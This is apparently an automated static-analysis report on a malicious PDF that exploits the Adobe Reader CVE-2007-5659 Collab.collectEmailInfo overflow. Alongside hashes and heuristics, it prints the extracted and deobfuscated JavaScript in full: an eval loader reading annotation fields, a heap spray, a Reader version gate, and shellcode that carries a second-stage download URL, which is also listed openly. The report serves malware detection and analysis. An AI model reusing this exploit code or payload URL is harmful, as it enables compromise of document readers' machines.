Malicious PDF — malware analysis report

Static analysis result for SHA-256 e78f07eea5077179…

MALICIOUS

PDF

8.3 KB First seen: 2026-05-08
MD5: 91a37951d7861fe6222cc0338db25311 SHA-1: b406e89008c4764294f2caaf6c30fe79483ddaa7 SHA-256: e78f07eea50771791e92bb3c9a614a5cbbfcf4cd760fb40868808ed76401a81b
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript streams, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', appear to be obfuscated but suggest an attempt to decode and execute further code. This pattern is commonly used to download and execute a second-stage payload. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic further supports the use of JavaScript for malicious actions within the PDF structure.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var b_e_N_t3_l = new Array();var qkaIU__28E = 0;var xP_ATP_X6AB1Q61 = "";function JTQ6_e(D7u7_W, Gw7WS2){var R5___bd3hCNiT = Gw7WS2.toString();var CL__Nb = "";for(var hy47_k_xUx_s = 0; hy47_k_xUx_s < R5___bd3hCNiT.length; hy47_k_xUx_s++) {var d_RHO__658g = parseInt(R5___bd3hCNiT.substr(hy47_k_xUx_s, 1));if (!isNaN(d_RHO__658g)) {d_RHO__658g = d_RHO__658g.toString(16);if (d_RHO__658g.length == 1) { d_RHO__658g = "0" + d_RHO__658g; }else if (d_RHO__658g.length != 2) { d_RHO__658g = "00"; }CL__Nb = …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://googleinru.in/cgi-bin/etn/z004106201r0019R357a796fXcffdb74bY376c4c04Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1BCB 1708 bytes
SHA-256: 3894930d59a3c32588e0ee57766ee2edce02f6fc0cdfe1040b292a57998175cc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function d__N___m_Ro(ryfP__gn, aeP_54__oJt6d4a){var v_W61y3Ye = 4;var Xo_T_m = new Array();var S8j2wd_i4_j02e7 = new Array(107,256,11,  512, 106, 11,  44,40, 33);S8j2wd_i4_j02e7[5] += 12;var GH_n07_p60Yu = "";try {var v85dC_y = 0;if (app) {aeP_54__oJt6d4a = pr[v85dC_y].subject;}} catch(e) {}if (!ryfP__gn) { Xo_T_m[0] = 0;Xo_T_m[1] = Xo_T_m[0];Xo_T_m[2] = Xo_T_m[1];Xo_T_m[3] = Xo_T_m[2];var qD_dsN20_N = S8j2wd_i4_j02e7[6] + 3;var n2_53_Yv = qD_dsN20_N + 11;var OG_36p = d__N___m_Ro;var W20HpBw_0H = 0;OG_36p = OG_36p.toString();for(var G_n_S1_s1n2G1 = 0; G_n_S1_s1n2G1 < OG_36p.length; G_n_S1_s1n2G1++) {var Y0_ccy_c = OG_36p.charCodeAt(G_n_S1_s1n2G1);if (Y0_ccy_c > qD_dsN20_N && Y0_ccy_c < n2_53_Yv) {if (W20HpBw_0H == 4) {W20HpBw_0H = 0;}Xo_T_m[W20HpBw_0H] += Y0_ccy_c;if (Xo_T_m[W20HpBw_0H] > S8j2wd_i4_j02e7[3]) {Xo_T_m[W20HpBw_0H] -= 512;}W20HpBw_0H++;}}}else  { Xo_T_m = ryfP__gn;}for (var de_p_0q5_3_dh = 0; de_p_0q5_3_dh < 4; de_p_0q5_3_dh++) {if (Xo_T_m[de_p_0q5_3_dh] > S8j2wd_i4_j02e7[1]) {Xo_T_m[de_p_0q5_3_dh] -= S8j2wd_i4_j02e7[1];}}var YVf7Hc6R6 = 0;var O8s_8VR_7X_J = 0;var D_B___0_P_Ht;var bmV_54c = 0;while ( YVf7Hc6R6 < aeP_54__oJt6d4a.length ) {var rb__U_c6E__of8u = "";rb__U_c6E__of8u = aeP_54__oJt6d4a.substr(YVf7Hc6R6, 2);var i__0x8fO__3 = parseInt(rb__U_c6E__of8u, S8j2wd_i4_j02e7[5]); if (O8s_8VR_7X_J == 4) {O8s_8VR_7X_J = 0;}i__0x8fO__3 -= (bmV_54c + 2) * Xo_T_m[O8s_8VR_7X_J];if (i__0x8fO__3 < 0) {i__0x8fO__3 -= Math.floor(i__0x8fO__3 / S8j2wd_i4_j02e7[1]) * S8j2wd_i4_j02e7[1];}GH_n07_p60Yu += String.fromCharCode(i__0x8fO__3);{YVf7Hc6R6 += 2;bmV_54c++;O8s_8VR_7X_J++;}}var v3i5nM_p_WKY_R = this;v3i5nM_p_WKY_R["eval"](GH_n07_p60Yu);return 0;}

	d__N___m_Ro(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4936 bytes
SHA-256: 48c70d294d1dba198860b262a662bc3bc7e0619f37e07954f39c150b48a0e008
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var b_e_N_t3_l = new Array();var qkaIU__28E = 0;var xP_ATP_X6AB1Q61 = "";function JTQ6_e(D7u7_W, Gw7WS2){var R5___bd3hCNiT = Gw7WS2.toString();var CL__Nb = "";for(var hy47_k_xUx_s = 0; hy47_k_xUx_s < R5___bd3hCNiT.length; hy47_k_xUx_s++) {var d_RHO__658g = parseInt(R5___bd3hCNiT.substr(hy47_k_xUx_s, 1));if (!isNaN(d_RHO__658g)) {d_RHO__658g = d_RHO__658g.toString(16);if (d_RHO__658g.length == 1) { d_RHO__658g = "0" + d_RHO__658g; }else if (d_RHO__658g.length != 2) { d_RHO__658g = "00"; }CL__Nb = d_RHO__658g + CL__Nb;}}while(CL__Nb.length < 8) { CL__Nb = "0" + CL__Nb; }var JwEHpe764Ey = D7u7_W.toString(16);if (JwEHpe764Ey.length == 1) { JwEHpe764Ey = "0" + JwEHpe764Ey; }else if (JwEHpe764Ey.length != 2) { JwEHpe764Ey = "00"; }CL__Nb = "3" + JwEHpe764Ey + "P" + CL__Nb;return CL__Nb;}function q_b__W_mXC_BN(X5___1vtj__2s, IA58CSo38a3){var QW5_7_Cm1 = new Array("");var e_n0_7e0U = X5___1vtj__2s;var Ug__Toc;if ((Ug__Toc = X5___1vtj__2s.lastIndexOf("%u00")) != -1) {if (Ug__Toc + 6 == X5___1vtj__2s.length) {QW5_7_Cm1[0] = X5___1vtj__2s.substr(Ug__Toc + 4, 2);e_n0_7e0U = X5___1vtj__2s.substring(0, Ug__Toc);}}Ug__Toc = 1;for (hy47_k_xUx_s = 0; hy47_k_xUx_s < IA58CSo38a3.length; hy47_k_xUx_s++) {var Y_26_4F = IA58CSo38a3.charCodeAt(hy47_k_xUx_s).toString(16);if (Y_26_4F.length == 1) { Y_26_4F = "0" + Y_26_4F; }QW5_7_Cm1[Ug__Toc] = Y_26_4F;Ug__Toc++;}hy47_k_xUx_s = QW5_7_Cm1[0].length ? 0 : 1;QW5_7_Cm1[Ug__Toc] = "00";QW5_7_Cm1[Ug__Toc + 1] = "00";Ug__Toc += 2;if ((QW5_7_Cm1.length - hy47_k_xUx_s) % 2) {QW5_7_Cm1[Ug__Toc] = "00";}while(hy47_k_xUx_s < QW5_7_Cm1.length) {e_n0_7e0U += "%u" + QW5_7_Cm1[hy47_k_xUx_s + 1] + QW5_7_Cm1[hy47_k_xUx_s];hy47_k_xUx_s += 2;}e_n0_7e0U += "%u0000";return e_n0_7e0U;}function DWcO_bxe8(nubGP12_Nf_O_p, C__F_y6c1__IDxj){while (nubGP12_Nf_O_p.length*2<C__F_y6c1__IDxj) {nubGP12_Nf_O_p += nubGP12_Nf_O_p;}nubGP12_Nf_O_p = nubGP12_Nf_O_p.substring(0,C__F_y6c1__IDxj/2);return nubGP12_Nf_O_p;}function L__rh182t(Sm4__pg__jm_e, y8aYg4D_Ol3Mc3, Apn_1k){var qM_d__O4T__f = 0x0c0c0c0c;var nubGP12_Nf_O_p = unescape(y8aYg4D_Ol3Mc3);var IA58CSo38a3 = JTQ6_e(Sm4__pg__jm_e, Apn_1k);var J24K___RUo = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var X5___1vtj__2s = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6d70%u4157%u0068%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3134%u3630%u3032%u7231%u3030%u3931%u3352%u3735%u3761%u3639%u5866%u6663%u6466%u3762%u6234%u3359%u3637%u3463%u3063%u5a34%u3130%u3030%u3066%u3036";app.G5M_Yc60_x = unescape(q_b__W_mXC_BN(X5___1vtj__2s, IA58CSo38a3));var ph464esB1_4e = 0x400000;var D_5l5Q37_H_p8f = J24K___RUo.length * 2;var C__F_y6c1__IDxj = ph464esB1_4e - (D_5l5Q37_H_p8f+0x38);nubGP12_Nf_O_p = DWcO_bxe8(nubGP12_Nf_O_p, C__F_y6c1__IDxj);var pc453X2KjLi = (qM_d__O4T__f - 0x400000)/ph464esB1_4e;for (var w_C3__1Kx_bdO = 0; w_C3__1Kx_bdO < pc453X2KjLi; w_C3__1Kx_bdO++) {b_e_N_t3_l[w_C3__1Kx_bdO] = nubGP12_Nf_O_p + J24K___RUo;}}function C8_Q33(){var x51_MU__tqjQ0 = "";for (hy47_k_xUx_s = 0; hy47_k_xUx_s < 12; hy47_k_xUx_s++) {x51_MU__tqjQ0 += unescape("%u0c0c%u0c0c");}var qP0_b6k = "";for (hy47_k_xUx_s = 0; hy47_k_xUx_s < 750; hy47_k_xUx_s++) {qP0_b6k += x51_MU__tqjQ0;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: qP0_b6k});app.clearTimeOut(qkaIU__28E);}function O1t_Q1(ds_x_b6r){var H__Cm8b2 = qkaIU__28E;if ((ds_x_b6r >= 8 && ds_x_b6r < 8.11) || ds_x_b6r < 7.1) {L__rh182t(23, "%u0c0c%u0c0c", ds_x_b6r);C8_Q33();}if (H__Cm8b2) {app.clearTimeOut(H__Cm8b2);}}var Apn_1k = 0;var iD0__846o___7I6 = app.plugIns;for (var yd_VS_vH = 0; yd_VS_vH < iD0__846o___7I6.length; yd_VS_vH++) {var A_3_EI_0 = iD0__846o___7I6[yd_VS_vH].version;if (A_3_EI_0 > Apn_1k) { Apn_1k = A_3_EI_0; }}if (app.viewerVersion == 9.103 && Apn_1k < 9.13) {Apn_1k = 9.13;}app.a____q = O1t_Q1;qkaIU__28E = app.setTimeOut("app.a____q(" + Apn_1k.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.